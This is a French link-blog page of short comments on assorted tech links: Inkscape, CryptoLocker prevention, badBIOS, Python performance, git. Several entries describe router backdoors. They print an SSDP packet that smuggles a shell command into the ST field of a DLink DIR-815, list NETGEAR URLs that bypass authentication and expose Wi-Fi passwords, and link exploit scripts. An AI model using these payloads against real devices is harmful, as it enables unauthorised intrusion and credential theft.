Un arbre de Noël avec InkScape. J'ai appris un tac de trucs !

via https://orangina-rouge.org/shaarli/?g4UUqQ
(Permalink)

Un petit soft pour prévenir une infection de CryptoLocker. Il suffit de le lancer une fois, ensuite l'exécutable peut-être supprimé.
Pour infos, CryptoLocker est un ransomware bien chiant puisque les fichiers infectés sont chiffrés à l'aide d'un clef RSA 2048 bits, donc pas de crackage de clef possible, il faut vraiment payer (mais ne le faîtes pas !).
(Permalink)

(Permalink)

Un mec, qui semble calé sur le sujet, critique le fameux #badBIOS.

via http://sebsauvage.net/links/?9_aq-g
(Permalink)

Wow, c'est classe !
(Permalink)

Quelques conseils pour booster un peu les perf de vos scripts python.
(Permalink)

Utiliser les memoryview pour éviter des copies inutiles. En les utilisant, la mémoire est partagée entre deux objets, ce qui permet de piocher directement dedans plutôt que de faire de copie supplémentaire.
(Permalink)

Un guide, si je puis appeler ça ainsi, des routeurs contenant des portes dérobée et comment les exploiter. Comme ça fleurit de partout ces derniers temps, je le garderai à jour, ça pourra toujours servir.
(Permalink)

Ça fait une petite base mine de rien.

Voici le routeur DLink DIR-815 qui se fait rooter, un packet :

M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:`ICI LA COMMANDE`
MX:2
MAN:"ssdp:discover"

à envoyer en multicast sur 239.255.255.250, pour le port UDP 1900.

Il y a un script python qui permet de lancer la commande désirée : https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection
(Permalink)

Un bookmarklet pour ouvrir tous les sites désirés dans des onglets => féniasse niveau 99.
(Permalink)

Ça date de 2011, je ne pensais pas que des commandes telles que ifconfig ou netstat puissent devenir obsolètes. Va falloir y jeter un œil attentivement.
Voici le message des développeurs, datant de 2009 : http://lists.debian.org/debian-devel/2009/03/msg00780.html

Je pense mettre à jour Pombo.

via https://www.mypersonnaldata.eu/shaarli/?OeIV2w
(Permalink)

Je kiffe !
(Permalink)

Une police gratuite.
(Permalink)

Rooter un téléphone Android sans utiliser d’ordinateur.

via Korben
(Permalink)

Que c'est mouvementé en ce mois d'octobre !
Voici une nouvelle porte dérobée découverte dans les routeurs NETGEAR WNDR3700v4, WNDR3800 et WNDR4700.

C'est assez tendu puisqu'en visitant la page suivante, même en redémarrant le routeur, ça reste open bar :
http://<router address>/BRS_02_genieHelp.html

Et pour avoir les mots de passe Wi-Fi en clair... :
http://<router address>/BRS_success.html

Bref, ça pue, ça pue, ça pue !
Mais que font les développeurs, bordel de bordel de merde ?!

Édit : plus d'infos, histoire de passer des commandes shell : http://shadow-file.blogspot.fr/2013/10/netgear-root-compromise-via-command.html
(copie du script) https://tiger-222.fr/paste/?3ec20a62650c94a5#m8h84Z277Ajt/NqYpt1ZeEbGiHwOvzvSGv78v39pjCw=

Édit 2 : apparemment, pas mal de NetGear ont un mot de passe root codé en dur :
https://netgear-telnetenable.googlecode.com/svn/trunk/telnetenable.py
(copie) https://tiger-222.fr/paste/?7b254ecdd7f4887c#O9XModbrfDcCki7HgEX9gpZFy8WuM6YRA8/iPw7SWB0=
(Permalink)

Tien, je n'avais pas vu passer ce "badbios", mais s'il s'avère réel, c'en est fini pour nous !
C'est un virus (si on peut appelé ça comme ça) qui infecte le firmware des clefs USB, aucun fichier n'est modifié sur la clef. Comme d'hab, toutes les clefs USB seront à leur tour infectées. Et donc ce virus reflashe le BIOS, même une réinstallation officielle du BIOs n'y changera rien. Le pire dans tout ça, c'est comment il communique...
(Permalink)

Il s'agit surtout d'un mémo pour recréer la branche master à partir d'un certain commit.
(Permalink)

Quelques explications pour faire de meilleures affiches.

via @orangedriveFR
(Permalink)

Un modèle clair et simple pour gérer ses projets.
Comme c'est un peu brouillon chez moi, je vais tenter de m'y conformer.
(Permalink)

Un article qui parle de CoffeeScript (JavaScript) et de canvas HTML5.
(Permalink)